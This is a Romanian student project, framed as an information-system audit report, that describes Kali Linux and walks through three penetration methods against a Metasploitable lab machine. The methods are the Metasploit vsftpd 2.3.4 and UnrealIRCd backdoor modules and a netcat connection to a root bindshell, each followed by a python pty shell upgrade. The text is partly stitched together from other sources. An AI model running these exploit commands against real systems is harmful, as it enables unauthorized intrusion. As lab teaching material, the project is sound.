Documente Academic
Documente Profesional
Documente Cultură
DE VEST DIN TIMIȘOARA
FACULTATEA DE ECONOMIE ȘI DE ADMINISTRARE A AFACERILOR
MASTER AUDIT FINANCIAR CONTABIL
https://www.hackingarticles.in/ssh-penetration-testing-port-22/
PROIECT
Nume student
Barbulet Ioana
Fumor Ioana
Master : SIA
Timișoara, 2020
Raport cu privire la auditul sistemului informațional
-CUPRINS-
1. Prezentarea sistemului informațional …………………………………..……………................................3
2. Obiectivele misiunii de audit SI .................................................................................. 4
3. Analiza sistemului ................................................................. ……………………………………...4
3.1. Selecția metodei de analiză a riscurilor ............................................................................4
3.2. Procedura de exploatare a vulnerabilități………………………………………….............................5
3.3. Exploataea și post-exploatare………………………………………..................................................5
1. Prezentarea a sistemului informațional
Kali Linux este un proiect open source care este întreținut și finanțat de Offensive Security ,
un furnizor de servicii de pregătire în domeniul securității informațiilor de nivel mondial și servicii
de testare a penetrării.
Servicii oferite:
Kali Linux vine cu peste 600 de unelte preinstalate de securitate și de testare a
vulnerabilității sistemului.
Aircrack-ng
Armitage
Binwalk
Burp suite
Cisco Global Exploiter
Ettercap
Foremost
Hydra
John the Ripper
Kismet
Maltego
Metasploit
Nmap
OWASP ZAP
Programe pentru Inginerie socială și Inginerie inversă
Sqlmap
Volatility (software)
Wireshark
Contine modulele:
Comanda shell permite utilizatorilor să ruleze scripturi de colecție sau să ruleze
comenzi arbitrare împotriva gazdei.
Meterpreter permite utilizatorilor să controleze ecranul unui dispozitiv folosind VNC și
să răsfoiască, să încarce și să descarce fișiere.
Încărcările utile dinamice permit utilizatorilor să se sustragă împotriva apărării anti-
virus, generând sarcini utile unice.
Sarcinile statice permit adresarea IP statică / redirecționarea porturilor pentru
comunicarea dintre gazdă și sistemul client.
Kali Linux este cel mai popular sistem de operarepentru profesioniștii din securitate din două
motive. În primul rând, are toate instrumentele populare de testare a penetrării preinstalate în ea,
astfel încât se reducecostul unei instalații separate. În al doilea rând, este un sistem de operare bazat
pe Linux, care îl face mai puțin predispus la atacuri de virus și oferă mai multă stabilitate în timpul
testării de penetrare. Nu trebuie să instalate componente și instrumente relevante și cine știe când
puteți întâmpina o eroare necunoscută în timpul procesului de instalare.
2. Obiectivele misiunii de audit SI
Vulnerabilități:
Vom folosi 3 vulnerabilitati pentru atac in 3 moduri:
Procedura de atac
Conceptul atacului asupra VSFTPD 2.3.4 este de a declanșa vsf_sysutil_extra();funcția rău
intenționată , trimițând o secvență de octeți specifici pe portul 21, care, la o execuție reușită, are ca
rezultat deschiderea portierei posterioare pe portul 6200 al sistemului.
3. Analiza sistemului
Pentru identificarea şi evaluarea riscurilor, în general, se parcurg următorii paşi:
identificarea vulnerabilitatilor;
determinarea frecvenţei şi duratei de apariţie a fiecărui factor de risc;
Următoarea captură de ecran a codului sursă vulnerabil va face lucrurile mult mai clare:
Putem vedea clar că dacă octeții din bufferul de rețea se potrivesc cu secvența din spatele spate de
0x3a (colon) și 0x29, funcția dăunătoare este declanșată.
3.3Exploatare și post-exploatare
Înainte de a utiliza Metasploit, trebuie să avem un laborator de testare. Cu toate acestea, dacă avem o
singură mașină, cea mai bună idee este să creăm un mediu virtual.
Pentru a crea medii virtuale, avem nevoie de software pentru mașini virtuale. Putem folosi oricare
dintre două dintre cele mai populare: VirtualBox și VMware player.
4.2. Bazele Metasploit
6
Mai sus putem vedea lista cu porturile deschise (*/tcp)
Metoda 1 de penetrare
serviciul ftp port 21 - vsftpd 2.3.4
8
Vom cauta payload-uri vsftpd 2.3.4 folosind comanda:
msf > search vsftpd 2.3.4
9
Urmeaza atacul propriu-zis:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.0.125 (adresa IP a victimei – remote host )
show options
Penetrarea se face folosind comanda: exploit
10
Penetrarea a fost facuta dupa cum se poate vedea in imaginea de mai sus.
Daca vrem sa obtinem cursor folosim comanda python: python -c 'import pty;
pty.spawn("/bin/bash")'
Metoda 2 de penetrare
serviciul shell port 1524 - Metasploitable root shell
Se va folosi comanda: root@kali# nc (netcat) 192.168.0.125 1524
Rezultatul:
Penetrarea a fost facuta dupa cum se poate vedea in imaginea de mai sus.
Metoda 3 de penetrare
Am penetrat serviciul irc port 6667 0 UnrealIRCd
Incepem utilizarea Metasploit Framework cu comanda: search UnrealIRCd
11
Apoi, dupa cautarea google vom da comanda:
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
12
Dupa care se va face penetrarea propriu-zisa cu comanda: exploit
Daca vrem sa obtinem cursor pentru a continua atacul folosim comanda python: python -c 'import
pty; pty.spawn("/bin/bash")'
13
14
Bibliografie
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
https://subscription.packtpub.com/book/networking_and_servers/9781786463166/1/ch01lvl1sec17
/modeling-threats
https://www.kali.org/
https://sourceforge.net/projects/metasploitable/
1.2.2 - SSH Service The Secure Shell (SSH)3 service is most commonly used to remotely access a
computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH
protocol has some surprising and useful features, beyond providing terminal access. The SSH service
is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following
command into a Kali terminal.
15